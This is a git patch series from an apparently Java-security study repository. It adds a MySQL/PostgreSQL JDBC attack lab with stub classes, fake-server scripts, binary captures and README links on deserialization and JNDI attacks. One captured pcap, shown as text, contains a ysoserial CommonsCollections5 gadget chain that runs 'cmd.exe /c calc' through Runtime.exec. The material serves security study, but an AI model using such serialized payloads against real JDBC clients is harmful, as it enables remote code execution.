create mode 100644 JDBC/PostgreSql/src/main/java/com/test/exp/SocketFactory.java create mode 100644 JDBC/PostgreSql/src/main/resources/application.yml create mode 100644 JDBC/mysql/SpringTarget/pom.xml create mode 100644 JDBC/mysql/SpringTarget/src/main/resources/application.yml create mode 100644 JDBC/mysql/YsoserialGadgetGenerate.bin create mode 100644 JDBC/mysql/cc5.pcap create mode 100644 JDBC/mysql/final.pcap create mode 100644 JDBC/mysql/hex.pcap create mode 100644 JDBC/mysql/hex1.pcap create mode 100644 JDBC/mysql/mysql.pcap create mode 100644 JDBC/mysql/no-outbound/pom.xml create mode 100644 JDBC/mysql/no-outbound/src/main/java/exp/Exp.java create mode 100644 PyCharm/JDBC/Mysql/convert.py create mode 100644 PyCharm/JDBC/Mysql/fakeServer.py create mode 100644 PyCharm/JDBC/Mysql/fakeServerM4x.py create mode 100644 PyCharm/JDBC/Mysql/hex.txt diff --git a/CodeAudit/BasicVulStudy/FileWRD/src/main/java/com/read/FileRead.java b/CodeAudit/BasicVulStudy/FileWRD/src/main/java/com/read/FileRead.java new file mode 100644 index 0000000..44d6f2d --- /dev/null +++ b/CodeAudit/BasicVulStudy/FileWRD/src/main/java/com/read/FileRead.java @@ -0,0 +1,4 @@ +package com.read; + +public class FileRead { +} diff --git a/CodeAudit/BasicVulStudy/FileWRD/test.txt b/CodeAudit/BasicVulStudy/FileWRD/test.txt new file mode 100644 index 0000000..e69de29 diff --git a/JDBC/PostgreSql/ascii.jar b/JDBC/PostgreSql/ascii.jar new file mode 100644 index 0000000000000000000000000000000000000000..7561305dd935569d34786439914ec61d9bc7a82e GIT binary patch literal 1140 zcmds1-EY${5cj^`_we*p=lsu1F_u1nNdNjneM(3C|qbFDdZ+9q)g%ewySxK1~X z!G!wCNw&}D``wpMH^fKBF986jb^-7@64$540DL?G;Kbfr?|!IjYq+Ur!MVU_12Wc&p(#`vhJD&tqELa4HbWfxW3`0Xu~#(3^TXa-Sq zx5+S^E5Xt_&dE(MCQ!w?4%2v@lb>I|7b61iE^a3gRXk?UYR4=mUF&2eWs)QT^M%#@ zCU~ZjT9iR8){^P2%D8k8ayx+yIqYh~(%x_8`Uj(|3H)JRKB{LJR)z14-Nr%ept8(^02wlF~lb?8p#1@ LTjs5uEdcxik4r{! literal 0 HcmV?d00001 
diff --git a/JDBC/PostgreSql/origin.jar b/JDBC/PostgreSql/origin.jar new file mode 100644 index 0000000000000000000000000000000000000000..86bf5fbfe20e7ba38226df51cb920c11be77099e GIT binary patch literal 412 zcmWIWW@Zs#U|`^2C|=YawZ#8v4G$v&Lo^cu11nI}P_H64XX*rB?;{2RZST2%%R9aE z-BmU5QrW@g<)SR2d(JJ}*t^X0-G6>%BudZ+O63y#4~AuS;WP2zZX8JnU~(y%zdkzeeayLzf-Plm2p+C zejvE;HgBi?#-mNI#O?39JyAPf{^#w-4>A{hB)=rI#JoHpn)&V^*N6LM=g(^2iCO&A zbHdRU-5VFIY9;a=LxL|p^ys|M@K8nGfbnud)VC*VCUksXe5to&ipJuaYu@*7I<#z^ zW6$4pxP^E3uE2`dMg?zIe!YB+>u*%_YvC7x*B0e_$sIl|rT1?t#|3d0ReQ+@?s{px z#}}O@F|FCp5a7+oWY2&rz*K-i1_BCT5*mD5P%a~b1jE1iogv$o-v)*-DhTjqWdn&Y M0%16i)(5Kq0Py6VumAu6 literal 0 HcmV?d00001 diff --git a/JDBC/PostgreSql/src/main/java/com/test/StartApplication.java b/JDBC/PostgreSql/src/main/java/com/test/StartApplication.java new file mode 100644 index 0000000..782a11a --- /dev/null +++ b/JDBC/PostgreSql/src/main/java/com/test/StartApplication.java @@ -0,0 +1,4 @@ +package com.test; + +public class StartApplication { +} diff --git a/JDBC/PostgreSql/src/main/java/com/test/UrlEncodeFile.java b/JDBC/PostgreSql/src/main/java/com/test/UrlEncodeFile.java new file mode 100644 index 0000000..da75283 --- /dev/null +++ b/JDBC/PostgreSql/src/main/java/com/test/UrlEncodeFile.java @@ -0,0 +1,4 @@ +package com.test; + +public class UrlEncodeFile { +} diff --git a/JDBC/PostgreSql/src/main/java/com/test/controller/IndexController.java b/JDBC/PostgreSql/src/main/java/com/test/controller/IndexController.java new file mode 100644 index 0000000..ce5482e --- /dev/null +++ b/JDBC/PostgreSql/src/main/java/com/test/controller/IndexController.java @@ -0,0 +1,4 @@ +package com.test.controller; + +public class IndexController { +} diff --git a/JDBC/PostgreSql/src/main/java/com/test/exp/FileWrite.java b/JDBC/PostgreSql/src/main/java/com/test/exp/FileWrite.java new file mode 100644 index 0000000..d233770 --- /dev/null +++ b/JDBC/PostgreSql/src/main/java/com/test/exp/FileWrite.java 
@@ -0,0 +1,4 @@ +package com.test.exp; + +public class FileWrite { +} diff --git a/JDBC/PostgreSql/src/main/java/com/test/exp/SocketFactory.java b/JDBC/PostgreSql/src/main/java/com/test/exp/SocketFactory.java new file mode 100644 index 0000000..df0ced7 --- /dev/null +++ b/JDBC/PostgreSql/src/main/java/com/test/exp/SocketFactory.java @@ -0,0 +1,4 @@ +package com.test.exp; + +public class SocketFactory { +} diff --git a/JDBC/PostgreSql/src/main/resources/application.yml b/JDBC/PostgreSql/src/main/resources/application.yml new file mode 100644 index 0000000..e69de29 diff --git a/JDBC/mysql/SpringTarget/pom.xml b/JDBC/mysql/SpringTarget/pom.xml new file mode 100644 index 0000000..bf38253 --- /dev/null +++ b/JDBC/mysql/SpringTarget/pom.xml @@ -0,0 +1,17 @@ + + + 4.0.0 + + com.test + SpringTarget + 1.0-SNAPSHOT + + + 8 + 8 + UTF-8 + + + \ No newline at end of file diff --git a/JDBC/mysql/SpringTarget/src/main/resources/application.yml b/JDBC/mysql/SpringTarget/src/main/resources/application.yml new file mode 100644 index 0000000..e69de29 
diff --git a/JDBC/mysql/YsoserialGadgetGenerate.bin b/JDBC/mysql/YsoserialGadgetGenerate.bin new file mode 100644 index 0000000000000000000000000000000000000000..795c3f61f528717738597e9b4c2a86449ce8f373 GIT binary patch literal 4060 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\#P,Q6j.mysql_native_password.......:.....!.......................root...&....av....S.M +.f..test.mysql_native_password..._runtime_version 1.8.0_341._client_version.5.1.47._client_name.MySQL Connector Java._client_license.GPL._runtime_vendor.Oracle Corporation.............................SHOW SESSION STATUS..........def..c.c.c.c.?................def..c.c.c.c.?.......................sr..javax.management.BadAttributeValueExpException....c-F@...L..valt..Ljava/lang/Object;xr..java.lang.Exception...>.;.....xr..java.lang.Throwable..5'9w.....L..causet..Ljava/lang/Throwable;L. +detailMessaget..Ljava/lang/String;[. +stackTracet..[Ljava/lang/StackTraceElement;L..suppressedExceptionst..Ljava/util/List;xpq.~..pur..[Ljava.lang.StackTraceElement;.F*<<."9...xp...'sr..java.lang.StackTraceElementa ..&6.....I. +lineNumberL..declaringClassq.~..L..fileNameq.~..L. +methodNameq.~..xp...Dt./me.l0tus.ysoserial.payloads.CommonsCollections5t..CommonsCollections5.javat. getObjectsq.~.....0q.~. +q.~..q.~..sq.~......t..ysoserial.gui.YsoForm$1t..YsoForm.javat..actionPerformedsq.~......t..javax.swing.AbstractButtont..AbstractButton.javat..fireActionPerformedsq.~.... ,t."javax.swing.AbstractButton$Handlerq.~..q.~..sq.~......t..javax.swing.DefaultButtonModelt..DefaultButtonModel.javaq.~..sq.~......q.~..q.~..t. +setPressedsq.~......t.*javax.swing.plaf.basic.BasicButtonListenert..BasicButtonListener.javat. 
+mouseReleasedsq.~......t..java.awt.Componentt..Component.javat..processMouseEventsq.~......t..javax.swing.JComponentt..JComponent.javaq.~.'sq.~......q.~.%q.~.&t..processEventsq.~......t..java.awt.Containert..Container.javaq.~.,sq.~......q.~.%q.~.&t..dispatchEventImplsq.~......q.~..q.~./q.~.1sq.~.....gq.~.%q.~.&t. +dispatchEventsq.~.....(t..java.awt.LightweightDispatcherq.~./t..retargetMouseEventsq.~......q.~.6q.~./q.~.'sq.~.....|q.~.6q.~./q.~.4sq.~......q.~..q.~./q.~.1sq.~.... +.t..java.awt.Windowt..Window.javaq.~.1sq.~.....gq.~.%q.~.&q.~.4sq.~......t..java.awt.EventQueuet..EventQueue.javaq.~.1sq.~.....aq.~.@q.~.At. +access$500sq.~......t..java.awt.EventQueue$3q.~.At..runsq.~......q.~.Eq.~.Aq.~.Fsq.~......t..java.security.AccessControllert..AccessController.javat..doPrivilegedsq.~.....Jt.5java.security.ProtectionDomain$JavaSecurityAccessImplt..ProtectionDomain.javat..doIntersectionPrivilegesq.~.....Tq.~.Mq.~.Nq.~.Osq.~......t..java.awt.EventQueue$4q.~.Aq.~.Fsq.~......q.~.Rq.~.Aq.~.Fsq.~......q.~.Iq.~.Jq.~.Ksq.~.....Jq.~.Mq.~.Nq.~.Osq.~......q.~.@q.~.Aq.~.4sq.~......t..java.awt.EventDispatchThreadt..EventDispatchThread.javat..pumpOneEventForFilterssq.~.....tq.~.Xq.~.Yt..pumpEventsForFiltersq.~.....iq.~.Xq.~.Yt..pumpEventsForHierarchysq.~.....eq.~.Xq.~.Yt. +pumpEventssq.~.....]q.~.Xq.~.Yq.~.`sq.~.....Rq.~.Xq.~.Yq.~.Fsr.&java.util.Collections$UnmodifiableList..%1.......L..listq.~..xr.,java.util.Collections$UnmodifiableCollection.B...^.....L..ct..Ljava/util/Collection;xpsr..java.util.ArrayListx.....a....I..sizexp....w.....xq.~.hxsr.4org.apache.commons.collections.keyvalue.TiedMapEntry....9......L..keyq.~..L..mapt..Ljava/util/Map;xpt..foosr.*org.apache.commons.collections.map.LazyMapn....y.....L..factoryt.,Lorg/apache/commons/collections/Transformer;xpsr.:org.apache.commons.collections.functors.ChainedTransformer0...(z.....[. 
+iTransformerst.-[Lorg/apache/commons/collections/Transformer;xpur.-[Lorg.apache.commons.collections.Transformer;.V*..4.....xp....sr.;org.apache.commons.collections.functors.ConstantTransformerXv..A......L. iConstantq.~..xpvr..java.lang.Runtime...........xpsr.:org.apache.commons.collections.functors.InvokerTransformer...k{|.8...[..iArgst..[Ljava/lang/Object;L..iMethodNameq.~..[..iParamTypest..[Ljava/lang/Class;xpur..[Ljava.lang.Object;..X..s)l...xp....t. +getRuntimeur..[Ljava.lang.Class;......Z....xp....t. getMethoduq.~......vr..java.lang.String...8z;.B...xpvq.~..sq.~.yuq.~.}....puq.~.}....t..invokeuq.~......vr..java.lang.Object...........xpvq.~.}sq.~.yuq.~.}....ur..[Ljava.lang.String;..V...{G...xp....t..cmd.exet../ct..calct..execuq.~......vq.~..sq.~.usr..java.lang.Integer.......8...I..valuexr..java.lang.Number...........xp....sr..java.util.HashMap......`....F. +loadFactorI. thresholdxp?@......w.........xx......."......../* mysql-connector-java-5.1.47 ( Revision: fe1903b1ecb4a96a917f7ed3190d80c049b1de29 ) */SELECT @@session.auto_increment_increment AS auto_increment_increment, @@character_set_client AS character_set_client, @@character_set_connection AS character_set_connection, @@character_set_results AS character_set_results, @@character_set_server AS character_set_server, @@collation_server AS collation_server, @@collation_connection AS collation_connection, @@init_connect AS init_connect, @@interactive_timeout AS interactive_timeout, @@license AS license, @@lower_case_table_names AS lower_case_table_names, @@max_allowed_packet AS max_allowed_packet, @@net_buffer_length AS net_buffer_length, @@net_write_timeout AS net_write_timeout, @@query_cache_size AS query_cache_size, @@query_cache_type AS query_cache_type, @@sql_mode AS sql_mode, @@system_time_zone AS system_time_zone, @@time_zone AS time_zone, @@tx_isolation AS transaction_isolation, @@wait_timeout AS wait_timeout \ No newline at end of file 
diff --git a/JDBC/mysql/hex.pcap b/JDBC/mysql/hex.pcap new file mode 100644 index 0000000000000000000000000000000000000000..d04bd062c8b9f0c925942d776b3965ed8bb32e9a GIT binary patch literal 5188 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 C$vw6J literal 0 HcmV?d00001 diff --git a/JDBC/mysql/no-outbound/pom.xml b/JDBC/mysql/no-outbound/pom.xml new file mode 100644 index 0000000..03de165 --- /dev/null +++ b/JDBC/mysql/no-outbound/pom.xml @@ -0,0 +1,17 @@ + + + 4.0.0 + + com.test + no-outbound + 1.0-SNAPSHOT + + + 8 + 8 + UTF-8 + + + \ No newline at end of file diff --git a/JDBC/mysql/no-outbound/src/main/java/exp/Exp.java b/JDBC/mysql/no-outbound/src/main/java/exp/Exp.java new file mode 100644 index 0000000..3d5261f --- /dev/null +++ b/JDBC/mysql/no-outbound/src/main/java/exp/Exp.java @@ -0,0 +1,4 @@ +package exp; + +public class Exp { +} diff --git a/PyCharm/JDBC/Mysql/convert.py b/PyCharm/JDBC/Mysql/convert.py new file mode 100644 index 0000000..e69de29 diff --git a/PyCharm/JDBC/Mysql/fakeServer.py b/PyCharm/JDBC/Mysql/fakeServer.py new file mode 100644 index 0000000..e69de29 diff --git a/PyCharm/JDBC/Mysql/fakeServerM4x.py b/PyCharm/JDBC/Mysql/fakeServerM4x.py new file mode 100644 index 0000000..e69de29 diff --git a/PyCharm/JDBC/Mysql/hex.txt b/PyCharm/JDBC/Mysql/hex.txt new file mode 100644 index 0000000..e69de29 diff --git a/README.md b/README.md index afc5a5a..1867955 100644 --- a/README.md +++ b/README.md @@ -7,19 +7,9 @@ - [Java安全基础](#Java安全基础) - [代码和jar包调试](#代码和jar包调试) - [反序列化](#反序列化) - - CC链 - - hessian - - 其他链子&姿势 - [JNDI](#JNDI) - - 基础内容 - - 高版本JDK绕过 - - 基于BeanFactory - - 其他Factory绕过(主要结合JDBC打) - [JDBC](#JDBC) - [shiro](#shiro) - - - shiro反序列化 - - shiro越权 - [Fastjson&Jackson&SnakeYaml](#Fastjson&Jackson&SnakeYaml) - [内存马&回显技术](#内存马&回显技术) - [高版本jdk下的链子](#高版本jdk下的链子) 
@@ -27,17 +17,7 @@ - [SpringBoot](#SpringBoot) - [工具开发/二开](#devTools) - [代码审计](#CodeAudit) - - - 若依 - - - WebGoat - - 泛微Ecology9 - - 用友U8Cloud - [代码审计辅助工具](#代码审计辅助工具) - - - jar-analyzer - - tabby - - CodeQL - [学习路线整合](#学习路线整合) - [工具推荐](#工具推荐) @@ -119,6 +99,22 @@
+# 查漏补缺 + +主要记录一些新遇到的小知识。 + +[Java Runtime.getRuntime().exec由表及里-先知社区](https://xz.aliyun.com/news/6642) 剖析了Runtime为什么不能识别特殊符号的本质 + +[shadow-horse/java.lang.Runtime.exec-Payload: 反弹shell,Runtime.exec()执行系统命令](https://github.com/shadow-horse/java.lang.Runtime.exec-Payload) Runtime命令生成 + + + + + +
+ + + # 反序列化 ## CC链 @@ -215,6 +211,8 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 [MySQL jdbc 反序列化分析 | Drunkbaby's Blog](https://drun1baby.top/2023/01/13/MySQL-jdbc-反序列化分析/) 最经典的mysql-jdbc +[mysql JDBC 攻击 | 1diot9's Blog](https://1diot9.github.io/2025/05/05/mysql-JDBC-绕过/) 整理了打法和绕过 + ============如果真的很急,JDBC可以先只看上面这一个mysql,其他的遇到了再学================= [从JDBC MySQL不出网攻击到spring临时文件利用-先知社区](https://xz.aliyun.com/news/17830) 这个打法比较新,其中的临时文件上传适用性广 From 82a1e9a37aa78f000b078efac5411b0ab5523306 Mon Sep 17 00:00:00 2001 From: 1diot9 <2868944833@qq.com> Date: Sun, 12 Oct 2025 14:22:38 +0800 Subject: [PATCH 05/16] =?UTF-8?q?update:=20=E6=9B=B4=E6=96=B0JDBC=20PY?= =?UTF-8?q?=E8=84=9A=E6=9C=AC?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- PyCharm/.idea/.gitignore | 8 ++ PyCharm/.idea/PyCharm.iml | 8 ++ .../inspectionProfiles/Project_Default.xml | 39 +++++++ .../inspectionProfiles/profiles_settings.xml | 6 ++ PyCharm/.idea/misc.xml | 7 ++ PyCharm/.idea/modules.xml | 8 ++ PyCharm/.idea/vcs.xml | 6 ++ PyCharm/JDBC/Mysql/convert.py | 3 + PyCharm/JDBC/Mysql/fakeServer.py | 100 ++++++++++++++++++ PyCharm/JDBC/Mysql/fakeServerM4x.py | 90 ++++++++++++++++ PyCharm/JDBC/Mysql/hex.pcap | Bin 0 -> 5188 bytes PyCharm/JDBC/Mysql/hex.txt | 6 ++ PyCharm/JDBC/Mysql/hex1.pcap | Bin 0 -> 4060 bytes 13 files changed, 281 insertions(+) create mode 100644 PyCharm/.idea/.gitignore create mode 100644 PyCharm/.idea/PyCharm.iml create mode 100644 PyCharm/.idea/inspectionProfiles/Project_Default.xml create mode 100644 PyCharm/.idea/inspectionProfiles/profiles_settings.xml create mode 100644 PyCharm/.idea/misc.xml create mode 100644 PyCharm/.idea/modules.xml create mode 100644 PyCharm/.idea/vcs.xml create mode 100644 PyCharm/JDBC/Mysql/hex.pcap create mode 100644 PyCharm/JDBC/Mysql/hex1.pcap diff --git a/PyCharm/.idea/.gitignore b/PyCharm/.idea/.gitignore new file mode 100644 index 0000000..35410ca --- /dev/null +++ b/PyCharm/.idea/.gitignore 
@@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git a/PyCharm/.idea/PyCharm.iml b/PyCharm/.idea/PyCharm.iml new file mode 100644 index 0000000..f571432 --- /dev/null +++ b/PyCharm/.idea/PyCharm.iml @@ -0,0 +1,8 @@ + + + + + + + + \ No newline at end of file diff --git a/PyCharm/.idea/inspectionProfiles/Project_Default.xml b/PyCharm/.idea/inspectionProfiles/Project_Default.xml new file mode 100644 index 0000000..528e736 --- /dev/null +++ b/PyCharm/.idea/inspectionProfiles/Project_Default.xml @@ -0,0 +1,39 @@ + + + + \ No newline at end of file diff --git a/PyCharm/.idea/inspectionProfiles/profiles_settings.xml b/PyCharm/.idea/inspectionProfiles/profiles_settings.xml new file mode 100644 index 0000000..105ce2d --- /dev/null +++ b/PyCharm/.idea/inspectionProfiles/profiles_settings.xml @@ -0,0 +1,6 @@ + + + + \ No newline at end of file diff --git a/PyCharm/.idea/misc.xml b/PyCharm/.idea/misc.xml new file mode 100644 index 0000000..db8786c --- /dev/null +++ b/PyCharm/.idea/misc.xml @@ -0,0 +1,7 @@ + + + + + + \ No newline at end of file diff --git a/PyCharm/.idea/modules.xml b/PyCharm/.idea/modules.xml new file mode 100644 index 0000000..c04746d --- /dev/null +++ 